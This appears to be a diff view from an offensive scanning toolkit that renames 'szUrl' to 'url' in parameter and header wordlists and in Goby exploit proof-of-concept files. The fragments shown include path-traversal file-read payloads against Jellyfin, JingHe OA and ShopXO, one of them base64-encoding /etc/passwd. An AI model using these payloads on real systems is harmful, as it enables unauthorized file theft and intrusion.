    604  -request-error-szUrl
     604 +request-error-url
    605 605  request-http-ver-1-0
    606 606  request-http-ver-1-1
    607 607  request-mbstring
    skipped 11 lines
    619 619  request-uri
    620 620  request-uri-too-large
    621 621  request-vars
    622  -request2-tests-base-szUrl
     622 +request2-tests-base-url
    623 623  request2-tests-proxy-host
    624 624  requesttoken
    625 625  reset-content
    skipped 115 lines
    741 741  ua-resolution
    742 742  ua-voice
    743 743  unauthorized
    744  -unencoded-szUrl
     744 +unencoded-url
    745 745  unit-test-mode
    746 746  unless-modified-since
    747 747  unprocessable-entity
    skipped 3 lines
    751 751  upgrade-required
    752 752  upload-default-chmod
    753 753  uri
    754  -szUrl
    755  -szUrl-from-env
    756  -szUrl-join-path
    757  -szUrl-join-query
    758  -szUrl-replace
    759  -szUrl-sanitize-path
    760  -szUrl-strip-
    761  -szUrl-strip-all
    762  -szUrl-strip-auth
    763  -szUrl-strip-fragment
    764  -szUrl-strip-pass
    765  -szUrl-strip-path
    766  -szUrl-strip-port
    767  -szUrl-strip-query
    768  -szUrl-strip-user
     754 +url
     755 +url-from-env
     756 +url-join-path
     757 +url-join-query
     758 +url-replace
     759 +url-sanitize-path
     760 +url-strip-
     761 +url-strip-all
     762 +url-strip-auth
     763 +url-strip-fragment
     764 +url-strip-pass
     765 +url-strip-path
     766 +url-strip-port
     767 +url-strip-query
     768 +url-strip-user
    769 769  use-gzip
    770 770  use-proxy
    771 771  user
    skipped 72 lines
    844 844  x-browser-width
    845 845  x-cascade
    846 846  x-cept-encoding
    847  -x-cf-szUrl
     847 +x-cf-url
    848 848  x-chrome-extension
    849 849  x-cisco-bbsm-clientip
    850 850  x-client-host
    skipped 55 lines
    906 906  x-flash-version
    907 907  x-flx-consumer-key
    908 908  x-flx-consumer-secret
    909  -x-flx-redirect-szUrl
     909 +x-flx-redirect-url
    910 910  x-foo
    911 911  x-foo-bar
    912 912  x-forward-for
    skipped 86 lines
    999 999  x-original-host
    1000 1000  x-original-http-command
    1001 1001  x-original-remote-addr
    1002  -x-original-szUrl
     1002 +x-original-url
    1003 1003  x-original-user-agent
    1004 1004  x-originally-forwarded-for
    1005 1005  x-originally-forwarded-proto
    skipped 7 lines
    1013 1013  x-pjax
    1014 1014  x-pjax-container
    1015 1015  x-prototype-version
    1016  -x-proxy-szUrl
     1016 +x-proxy-url
    1017 1017  x-pswd
    1018 1018  x-purpose
    1019 1019  x-qafoo-profiler
    skipped 11 lines
    1031 1031  x-rest-cors
    1032 1032  x-rest-password
    1033 1033  x-rest-username
    1034  -x-rewrite-szUrl
     1034 +x-rewrite-url
    1035 1035  x-sakura-forwarded-for
    1036 1036  x-scalr-auth-key
    1037 1037  x-scalr-auth-token
    skipped 38 lines
    1076 1076  x-upload-name
    1077 1077  x-upload-size
    1078 1078  x-upload-type
    1079  -x-szUrl-scheme
     1079 +x-url-scheme
    1080 1080  x-user
    1081 1081  x-user-agent
    1082 1082  x-username
    skipped 36 lines
  • ■ ■ ■ ■
    config/wordlists/parameters
    skipped 57 lines
    58 58  redirect
    59 59  uri
    60 60  continue
    61  -szUrl
     61 +url
    62 62  window
    63 63  next
    64 64  data
    skipped 6389 lines
  • ■ ■ ■ ■ ■ ■
    lib/goby/goby_pocs/Jellyfin_Audio_File_read_CVE_2021_21402.txt
    skipped 5 lines
    6 6   "git.gobies.org/goby/goscanner/jsonvul"
    7 7   "git.gobies.org/goby/goscanner/scanconfig"
    8 8   "git.gobies.org/goby/httpclient"
    9  - "net/szUrl"
     9 + "net/url"
    10 10   "strings"
    11 11  )
    12 12   
    skipped 87 lines
    100 100   func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
    101 101   file := ss.Params["File"].(string)
    102 102   file = strings.Replace(file, "/", "\\", -1)
    103  - file = szUrl.QueryEscape(file)
     103 + file = url.QueryEscape(file)
    104 104   uri := "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5C" + file + "/stream.mp3/"
    105 105   cfg := httpclient.NewGetRequestConfig(uri)
    106 106   cfg.VerifyTls = false
    skipped 12 lines
  • ■ ■ ■ ■
    lib/goby/goby_pocs/JingHe_OA_download.asp_File_read.txt
    skipped 7 lines
    8 8   "git.gobies.org/goby/httpclient"
    9 9   "strings"
    10 10   "regexp"
    11  - "net/szUrl"
     11 + "net/url"
    12 12  )
    13 13   
    14 14  func init() {
    skipped 74 lines
  • ■ ■ ■ ■ ■ ■
    lib/goby/goby_pocs/ShopXO_download_File_read_CNVD_2021_15822.txt
    skipped 74 lines
    75 75   goutils.GetFileName(),
    76 76   expJson,
    77 77   func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
    78  - uri := "/public/index.php?s=/index/qrcode/download/szUrl/L2V0Yy9wYXNzd2Q="
     78 + uri := "/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q="
    79 79   cfg := httpclient.NewGetRequestConfig(uri)
    80 80   cfg.VerifyTls = false
    81 81   cfg.FollowRedirect = false
    skipped 7 lines
    89 89   file := ss.Params["File"].(string)
    90 90   strbytes := []byte(file)
    91 91   encoded := base64.StdEncoding.EncodeToString(strbytes)
    92  - uri := "/public/index.php?s=/index/qrcode/download/szUrl/" + encoded
     92 + uri := "/public/index.php?s=/index/qrcode/download/url/" + encoded
    93 93   cfg := httpclient.NewGetRequestConfig(uri)
    94 94   cfg.VerifyTls = false
    95 95   cfg.FollowRedirect = false
    skipped 11 lines
  • ■ ■ ■ ■ ■ ■
    lib/goby/goby_pocs/showDocGo.txt
    skipped 3 lines
    4 4   "encoding/base64"
    5 5   "fmt"
    6 6   "log"
    7  - "net/szUrl"
     7 + "net/url"
    8 8   "regexp"
    9 9   "strings"
    10 10   "time"
    skipped 126 lines
    137 137   select {
    138 138   case webConsleID := <-waitSessionCh:
    139 139   log.Println("[DEBUG] session created at:", webConsleID)
    140  - if u, err := szUrl.Parse(strings.TrimSpace(webConsleID)); err == nil {
     140 + if u, err := url.Parse(strings.TrimSpace(webConsleID)); err == nil {
    141 141   expResult.Success = true
    142 142   expResult.OutputType = "html"
    143 143   sid := strings.Join(u.Query()["id"], "")
    skipped 28 lines
  • ■ ■ ■ ■ ■ ■
    static/NicePwn.md
    skipped 96 lines
    97 97   "httpx": {} // httpx 配置,
    98 98   "enableEsSv": true, // 开启结果send 到es
    99 99   "esthread": 8 // 结果写入Elasticsearch的线程数,
    100  - "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s" // Elasticsearch szUrl
     100 + "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s" // Elasticsearch url
    101 101  }
    102 102  ```
    103 103   
    skipped 14 lines
    118 118  http://127.0.0.1:9200/vscan_index/_doc/_search
    119 119  http://127.0.0.1:9200/hydra_index/_doc/_search
    120 120  http://127.0.0.1:9200/httpx_index/_doc/_search
    121  -http://127.0.0.1:9200/httpx_index/_doc/_search?q=szUrl:in%20%221.28.15.18%22
     121 +http://127.0.0.1:9200/httpx_index/_doc/_search?q=url:in%20%221.28.15.18%22
    122 122   
    123 123  ```
Please wait...
Page is in error, reload to recover